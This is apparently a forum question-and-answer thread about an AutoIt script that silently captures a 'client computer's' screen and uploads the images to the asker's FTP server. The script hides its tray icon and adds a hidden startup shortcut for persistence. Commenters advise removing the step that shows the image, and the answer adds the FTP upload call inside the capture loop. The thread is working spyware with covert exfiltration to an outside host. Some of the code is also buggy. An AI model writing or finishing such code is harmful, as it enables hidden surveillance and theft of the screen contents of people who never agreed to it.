# Capture Screen Silently with AutoIT

Tags: autoit

I have learning AutoIT to write something can capture screen and send to my FTP server. But everytime it run, it capture and immediately show the picture on the client computer. So, can someone help me fix this wrong? Thanks so much!

```
#include <ScreenCapture.au3>
#include <Inet.au3>
#include <MsgBoxConstants.au3>
#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <File.au3>
#include <Misc.au3>
#include <FTPEx.au3>
#include <ScreenCapture.au3>

Global $Save, $Num, $Server, $Username, $Password

$Server = "ftp.drivehq.com"
$Username = "my_account"
$Password = "my_password"

Capturing()
Func Capturing()
    AutoItSetOption("TrayIconHide", 1)

    $Shortcut = FileCreateShortcut(@AutoItExe, @StartupDir & "\" & @ScriptName & ".lnk")
    FileSetAttrib($Shortcut, "+H")
    $Save = @MyDocumentsDir & "/" & "Log" & $Num & ".jpg"
    _FileCreate($Save)
    $i = 0
While $i <= 10

    Local $hBmp

    ; Capture full screen
    $hBmp = _ScreenCapture_Capture("")

    ; Save bitmap to file
    _ScreenCapture_SaveImage(@MyDocumentsDir & "\GDIPlus_Image.jpg", $hBmp)

    ShellExecute(@MyDocumentsDir & "\GDIPlus_Image.jpg")
    Sleep(5000)

WEnd
EndFunc

Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_FilePut($oConnect, $LocFile, $RemFile)

_FTP_Close($oFTP)

EndFunc   ;==>_FTP_FileSend

Func _FTP_CreateDir($DirName)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_DirCreate($oConnect, $DirName)

_FTP_Close($oFTP)

EndFunc   ;==>_FTP_CreateDir
```

Comment: Just remove ShellExecute(@MyDocumentsDir & "\GDIPlus_Image.jpg") and sleep too.

Comment: $LocFile and $RemFile arent declared!

Comment: You've got an endless loop (`$i` never changes) and your upload command is *after*  the loop.

Answer (score 0):

Actually you are not telling it to upload the file to your FTP server, just to execute it.

```
#include <ScreenCapture.au3>
#include <Inet.au3>
#include <MsgBoxConstants.au3>
#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <File.au3>
#include <Misc.au3>
#include <FTPEx.au3>
#include <ScreenCapture.au3>

Global $Save, $Num, $Server, $Username, $Password

$Server = "ftp.drivehq.com"
$Username = "my_account"
$Password = "my_password"

Capturing()
Func Capturing()
    AutoItSetOption("TrayIconHide", 1)

    $Shortcut = FileCreateShortcut(@AutoItExe, @StartupDir & "\" & @ScriptName & ".lnk")
    FileSetAttrib($Shortcut, "+H")
    $Save = @MyDocumentsDir & "/" & "Log" & $Num & ".jpg"
    _FileCreate($Save)
    $i = 0
While $i <= 10

    Local $hBmp

    ; Capture full screen
    $hBmp = _ScreenCapture_Capture("")

    ; Save bitmap to file
    _ScreenCapture_SaveImage(@MyDocumentsDir & "\GDIPlus_Image.jpg", $hBmp)

    ShellExecute(@MyDocumentsDir & "\GDIPlus_Image.jpg") ; execute/show the image
    Sleep(5000)

    ; where' s the upload code?
    ; it could be:
    _FTP_FileSend($Server, $Username, $Password, @MyDocumentsDir & " \GDIPlus_Image.jpg" , "test.jpg")

WEnd
EndFunc

Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_FilePut($oConnect, $LocFile, $RemFile)

_FTP_Close($oFTP)

EndFunc   ;==>_FTP_FileSend

Func _FTP_CreateDir($DirName)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_DirCreate($oConnect, $DirName)

_FTP_Close($oFTP)

EndFunc   ;==>_FTP_CreateDir
```